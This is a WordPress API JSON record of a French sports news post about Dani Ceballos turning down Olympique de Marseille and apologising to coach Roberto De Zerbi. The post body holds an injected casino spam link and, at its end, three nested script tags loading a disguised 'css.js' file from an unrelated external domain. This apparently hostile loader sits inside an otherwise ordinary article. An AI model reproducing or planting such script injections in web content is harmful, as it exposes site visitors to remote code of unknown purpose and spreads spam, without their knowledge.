{"id":3857,"date":"2025-11-20T03:41:57","date_gmt":"2025-11-20T03:41:57","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3857"},"modified":"2026-02-02T22:13:18","modified_gmt":"2026-02-02T22:13:18","slug":"real-om-lappel-secret-de-ceballos-a-de-zerbi-apres-avoir-plante-lom","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/real-om-lappel-secret-de-ceballos-a-de-zerbi-apres-avoir-plante-lom\/","title":{"rendered":"Real\/OM &#8211; l&#x27;appel secret de Ceballos \u00e0 De Zerbi apr\u00e8s avoir plant\u00e9 l\u2019OM"},"content":{"rendered":"<h1>Real\/OM &#8211; l&#x27;appel secret de Ceballos \u00e0 De Zerbi apr\u00e8s avoir plant\u00e9 l\u2019OM<\/h1>\n<p><strong>Dani Ceballos<\/strong> a failli devenir joueur de l\u2019<strong>Olympique de Marseille<\/strong> cet \u00e9t\u00e9. L\u2019accord entre les deux parties \u00e9tait conclu et le milieu s\u2019appr\u00eatait \u00e0 rejoindre la Provence. Pourtant, au moment d\u00e9cisif, il a chang\u00e9 d\u2019avis et choisi de poursuivre son aventure au <strong>Real Madrid<\/strong>. Dans son entourage, on r\u00e9sume son choix par une phrase claire dans un article consacr\u00e9 au sujet dans les colonnes de <em>Marca<\/em> : &quot;<em>Ce n\u2019est pas facile de quitter le meilleur club du monde&quot;<\/em>.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-1995.com\/casino-1995-prime\/\" target=\"_blank\" rel=\"dofollow\">casino 1995 Prime<\/a><\/strong> &#8211; Vous \u00eates-vous d\u00e9j\u00e0 demand\u00e9 ce que r\u00e9serve le **Casino\u00a01995** en termes de **primes exceptionnelles**\u00a0? Quels types de bonus peut-on y d\u00e9couvrir, et comment<\/p><\/blockquote>\n<h2>Le r\u00f4le majeur de Roberto De Zerbi<\/h2>\n<p>Le principal artisan de ce dossier avait pour nom <strong>Roberto De Zerbi<\/strong>. Le coach italien avait propos\u00e9 un projet b\u00e2ti autour de Ceballos, en lui offrant un r\u00f4le central dans son dispositif. Le joueur avait appr\u00e9ci\u00e9 cette attention et, apr\u00e8s son refus final, il a tenu \u00e0 appeler personnellement De Zerbi pour s\u2019excuser et le remercier de son implication. Le coach italien a \u00e9voqu\u00e9 ce moment en conf\u00e9rence de presse ce lundi comme vous pouvez le voir en vid\u00e9o : <em>&quot;C\u2019est quelque chose qui reste entre nous. C\u2019est un grand joueur, une grande personne. Malheureusement, il n\u2019a pas voulu venir chez nous. Il joue d\u00e9j\u00e0 dans une grande \u00e9quipe. Il ne vient pas dans une autre grande \u00e9quipe comme l\u2019OM. Une \u00e9quipe sp\u00e9ciale. Mais demain, on a achet\u00e9 des excellents joueurs, et je pense que c\u2019est la vie, le foot&quot;.<\/em><\/p>\n<h2>La r\u00e9action marseillaise<\/h2>\n<p>Ce retournement de situation a suscit\u00e9 une certaine d\u00e9ception \u00e0 Marseille, mais le club a rapidement referm\u00e9 le dossier. <strong>Pablo Longoria<\/strong>, pr\u00e9sident de l\u2019OM, s&#x27;est aussi exprim\u00e9 sur ce sujet aupr\u00e8s du m\u00e9dia espagnol\u00a0: <em>&quot;Nous avons essay\u00e9 de le recruter et si je le croise je le saluerai, il ne faut pas \u00eatre rancunier dans la vie&quot;<\/em>. Une mani\u00e8re de clore le chapitre sans animosit\u00e9.<\/p>\n<h2>Un choc charg\u00e9 de symboles en Ligue des champions<\/h2>\n<p>Le calendrier de la <strong>Ligue des champions 2025-2026<\/strong> a r\u00e9serv\u00e9 une ironie du sort. Pour sa premi\u00e8re apparition dans la comp\u00e9tition cette saison, Ceballos affrontera justement l\u2019OM. Le match se jouera au Santiago Bernab\u00e9u, mais le symbole reste fort : l\u2019Espagnol croisera le club qui l\u2019attendait comme meneur de jeu et qui, au dernier moment, a vu filer sa recrue phare.<\/p>\n<h2>Un pari qui commence \u00e0 porter ses fruits \u00e0 Madrid<\/h2>\n<p>\u00c0 28 ans, le milieu voit son choix confort\u00e9 par un d\u00e9but de saison encourageant. Il a particip\u00e9 aux trois premi\u00e8res rencontres et a \u00e9t\u00e9 titularis\u00e9 le week-end dernier contre la Real Sociedad. Federico Valverde, l&#x27;habituel titulaire au milieu, devrait toutefois retrouver son poste pour la confrontation marseillaise. De son c\u00f4t\u00e9 l&#x27;OM a recrut\u00e9 Vermeeren et O&#x27;Riley dans l&#x27;entrejeu.\u00a0<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Real\/OM &#8211; l&#x27;appel secret de Ceballos \u00e0 De Zerbi apr\u00e8s avoir plant\u00e9 l\u2019OM Dani Ceballos a failli devenir joueur de l\u2019Olympique de Marseille cet \u00e9t\u00e9. L\u2019accord entre les deux parties&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3857","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3857","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3857"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3857\/revisions"}],"predecessor-version":[{"id":14947,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3857\/revisions\/14947"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3857"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3857"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3857"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}